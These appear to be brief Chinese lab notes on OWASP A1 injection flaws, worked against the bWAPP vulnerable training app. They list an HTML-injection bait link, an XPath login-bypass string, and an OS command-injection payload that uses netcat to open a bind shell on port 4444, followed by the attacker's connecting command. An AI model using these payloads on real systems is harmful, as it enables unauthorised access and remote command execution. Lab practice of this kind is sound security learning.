参考 http://www.owasp.org.cn/owasp-project/2017-owasp-top-10/
靶机全家桶 https://sourceforge.net/projects/owaspbwa/
A1-注入
注入非常常见例如:SQL,LDAP,XPath,OS命令,XML,SMTP,ORM等等.通过代码审计,扫描工具,手工测试等,可很快发现漏洞.
产生这种漏洞的原因是web程序缺少对输入数据进行安全检查,导致攻击者把包含指令数据发送给解释器.
bwapp HTML Injection - Reflected (GET)的注入
<a href=http://baidu.com>快点我领取</a>
XML/XPath Injection (Login Form)
test' or 1=1 or 'a'='a
OS Command Injection
www.nsa.gov && nc -vlp 4444 -e / bin / bash
链接成功
~# nc -vv 192.168.1.106 4444
192.168.1.106: inverse host